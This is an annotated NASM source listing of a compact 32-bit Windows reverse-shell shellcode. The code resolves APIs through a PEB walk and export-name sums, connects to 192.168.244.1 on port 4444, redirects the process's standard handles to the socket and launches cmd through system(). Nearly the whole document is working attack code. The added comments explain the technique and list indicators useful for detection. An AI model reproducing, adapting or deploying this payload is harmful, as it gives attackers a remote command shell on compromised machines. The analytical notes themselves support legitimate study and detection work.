;
; win32_reverse_std_handle
; 234 bytes
;
; Optimized win32 (NT/2K/XP/2003) reverse using
; direct STD handle updating and a call to system
; rather than using CreateProcessA and waiting.
; Based largely on Matthieu Suiche's implementation
; which can be found here:
;
; http://archives.neohapsis.com/archives/bugtraq/2005-08/0209.html
;
; and originally on Brett Moore's approach here:
;
; http://lists.virus.org/darklab-0312/msg00004.html
;
; Can probably have a few more bytes squeezed out, do it up!
;
; skape
; mmiller@hick.org
;
;-----------------------------------------------------------------------
; Reader's notes (analysis of the listing below; NASM syntax, 32-bit
; Windows x86, no stack frame, position independent via get_eip).
;
; Register roles once startup has run:
;   ebx = address of call_function (the export resolver)
;   ebp = base of the module the resolver searches; it is reassigned
;         kernel32 -> ws2_32 -> msvcrt as the payload progresses
;   edi = LoadLibraryA until save_context, then a pointer to a two-slot
;         stack "context": [edi] = LoadLibraryA, [edi+4] = ExitProcess
;   esi = scratch counter: 0 for the zero pushes, incremented to 1 and
;         then 2 (== AF_INET, also reused as the fs:[esi+0x2e] base)
;
; The resolver does not compute a real hash: it adds the first two
; dwords of each export name and compares the sum with the constant the
; caller pushed, e.g. "Load"+"Libr" = 0xd6c3d898, "Exit"+"Proc" =
; 0xd7d8ea95, "WSAS"+"tart" = 0xc7b3b4cb, "WSAS"+"ocke" = 0xb8acb6c6,
; "conn"+"ect\0" = 0x6ee2d2c8.  The "system" constant 0xe873e6d8 is
; "syst"+"em\0t": its last byte is the first character of whatever name
; follows "system" in that msvcrt's export table, so it is presumably
; build-specific -- verify before assuming it matches elsewhere.
;
; Observable artifacts useful when analysing a sample built from this:
; PEB walk through fs:[0x30] -> Ldr -> InInitializationOrderModuleList;
; stack-built strings "ws2_32", "msvcrt", "cmd"; hard-coded peer
; 192.168.244.1 (0x01f4a8c0) port 4444 (0x5c11 in network byte order);
; StandardInput/Output/Error of RTL_USER_PROCESS_PARAMETERS overwritten
; with the socket handle so the cmd child spawned by system() inherits it.
;-----------------------------------------------------------------------
GLOBAL _WinMain
BITS 32
section text                            ; note: plain "text", not ".text"
_WinMain:
entry:
    cld                                 ; lodsd/stosd below walk forward
find_kernel32:
    xor eax, eax
    mov eax, [fs:eax+0x30]              ; eax = PEB (TEB->ProcessEnvironmentBlock)
    mov eax, [eax + 0xc]                ; eax = PEB->Ldr
    mov esi, [eax + 0x1c]               ; esi = Ldr->InInitializationOrderModuleList.Flink
    lodsd                               ; eax = Flink of the first entry, i.e. the second module
    mov ebp, [eax + 0x8]                ; ebp = that entry's DllBase (+8 from the InInitOrder links);
                                        ; on the OS versions in the header this is kernel32.dll
get_eip:
    ; E8 FF FF FF FF = call to the last 0xFF byte of itself; executed from
    ; there the bytes FF C3 decode as "inc ebx".  The pushed return address
    ; is the address of the 0xC3 byte; startup adds 3 (0xC3 + the 2-byte
    ; jmp) to turn it into the address of call_function.
    db 0xe8, 0xff, 0xff, 0xff, 0xff, 0xc3
    jmp short startup
;-----------------------------------------------------------------------
; call_function -- export resolver
; In:    ebp = module base, [esp+4] = name-sum constant (pushed by caller)
; Out:   eax = resolved export address; the constant is NOT popped and is
;        still at [esp] after return (callers rely on that slot)
; Clobb: flags only (pushad/popad restore everything else)
; Frame after pushad: [esp+0x20] = return address, [esp+0x24] = constant,
; [esp+0x1c] = saved eax slot that popad reloads.
;-----------------------------------------------------------------------
call_function:
    pushad
    mov eax, [ebp + 0x3c]               ; e_lfanew
    mov edx, [ebp + eax + 0x78]         ; export directory RVA (DataDirectory[0])
    add edx, ebp                        ; edx = IMAGE_EXPORT_DIRECTORY*
    mov ebx, [edx + 0x20]               ; AddressOfNames RVA
    add ebx, ebp                        ; ebx = AddressOfNames
    xor ecx, ecx                        ; name index; first iteration uses 1, so entry 0 is skipped
enum_exports:
    inc ecx
    mov esi, [ebx + ecx*4]              ; RVA of name[ecx]
    add esi, ebp
    lodsd                               ; first 4 bytes of the name
    xchg edi, eax
    lodsd                               ; next 4 bytes of the name
    add edi, eax                        ; edi = dword0 + dword1
    cmp edi, [esp + 0x24]               ; compare with the pushed constant
    jnz enum_exports                    ; no NumberOfNames bound: an unmatched
                                        ; constant walks off the end of the table
export_found:
    mov ebx, [edx + 0x24]               ; AddressOfNameOrdinals RVA
    add ebx, ebp
    mov cx, [ebx + ecx*2]               ; cx = ordinal; upper half of ecx keeps the
                                        ; name index bits (fine while names < 0x10000)
    mov ebx, [edx + 0x1c]               ; AddressOfFunctions RVA
    add ebx, ebp
    add ebp, [ebx + ecx*4]              ; ebp = base + function RVA
    mov [esp + 0x1c], ebp               ; becomes eax after popad
    popad
    ret
startup:
    pop ebx                             ; address of the 0xC3 byte in get_eip
    add ebx, byte 0x3                   ; ebx = call_function
resolve_load_library:
    push 0xd6c3d898                     ; "Load"+"Libr"
    call ebx
    xchg eax, edi                       ; edi = LoadLibraryA
resolve_exit_process:
    push 0xd7d8ea95                     ; "Exit"+"Proc"
    call ebx
    xchg ebp, eax                       ; ebp = ExitProcess, eax = kernel32 base (discarded)
load_ws2_32:
    xor esi, esi
    push si                             ; "\0\0"
    push word 0x3233                    ; "23"
    push 0x5f327377                     ; "ws2_"  -> "ws2_32\0\0" on the stack
    push esp
    call edi                            ; LoadLibraryA("ws2_32"); eax = ws2_32 base
save_context:
    push ebp                            ; [edi+4] = ExitProcess
    push edi                            ; [edi]   = LoadLibraryA
    mov edi, esp                        ; edi = context pointer from here on
swap_base:
    xchg ebp, eax                       ; ebp = ws2_32 base for the resolver
wsa_startup:
    push 0xc7b3b4cb                     ; "WSAS"+"tart"
    call ebx
    sub sp, 0x190                       ; 16-bit op on sp saves bytes; reserves 400 bytes
                                        ; for WSADATA (assumes no 64K boundary crossing)
    push esp                            ; lpWSAData
    push byte 0x2                       ; wVersionRequested = 2
    call eax                            ; WSAStartup (stdcall cleans its 2 args)
wsa_socket:
    push 0xb8acb6c6                     ; "WSAS"+"ocke"
    call ebx
    push esi                            ; dwFlags = 0
    push esi                            ; g = 0
    push esi                            ; lpProtocolInfo = NULL
    push esi                            ; protocol = 0
    inc esi
    push esi                            ; type = 1 (SOCK_STREAM)
    inc esi
    push esi                            ; af = 2 (AF_INET); esi stays 2 from here
    call eax                            ; WSASocketA; eax = socket
set_std_handles:
    push edi                            ; stosd clobbers edi, keep the context pointer
    mov ecx, [fs:esi+0x2e]              ; esi = 2 -> fs:[0x30] = PEB
    mov edi, [ecx + 0x10]               ; PEB->ProcessParameters
    add edi, byte 0x18                  ; &ProcessParameters->StandardInput (32-bit layout)
    stosd                               ; StandardInput  = socket
    stosd                               ; StandardOutput = socket
    stosd                               ; StandardError  = socket
    pop edi
connect:
    push dword 0x01f4a8c0               ; sin_addr = 192.168.244.1
    push word 0x5c11                    ; sin_port = htons(4444)
    push si                             ; sin_family = AF_INET (esi == 2)
    mov esi, esp                        ; esi = &sockaddr_in (sin_zero is whatever lies above)
    push byte 0x10                      ; namelen = 16
    push esi                            ; name
    push eax                            ; socket
    push 0x6ee2d2c8                     ; "conn"+"ect\0"
    call ebx
    pop edx                             ; discard the constant so connect sees its 3 args
    call eax                            ; connect; eax = 0 on success
system:
    push ax                             ; low 16 bits of connect's result act as the
                                        ; terminator -- relies on connect having returned 0
    push word 0x7472                    ; "rt"
    push 0x6376736d                     ; "msvc"  -> "msvcrt\0\0"
    push esp
    call [edi]                          ; LoadLibraryA("msvcrt")
    xchg eax, ebp                       ; ebp = msvcrt base for the resolver
    push 0xe873e6d8                     ; "syst"+"em\0t" (see notes: table-layout dependent)
    call ebx
    sub dword [esp], 0xe80f7975         ; 0xe873e6d8 - 0xe80f7975 = 0x00646d63 = "cmd\0";
                                        ; the leftover constant slot becomes the command string
    push esp
    call eax                            ; system("cmd"); cdecl, blocks until cmd exits
; Label appears without a colon here (other labels use one); NASM still
; treats the leading identifier as a label.  The cdecl argument is never
; popped, so ExitProcess's uExitCode is the stale pointer at [esp].
exit_process call [edi + 0x4]           ; ExitProcess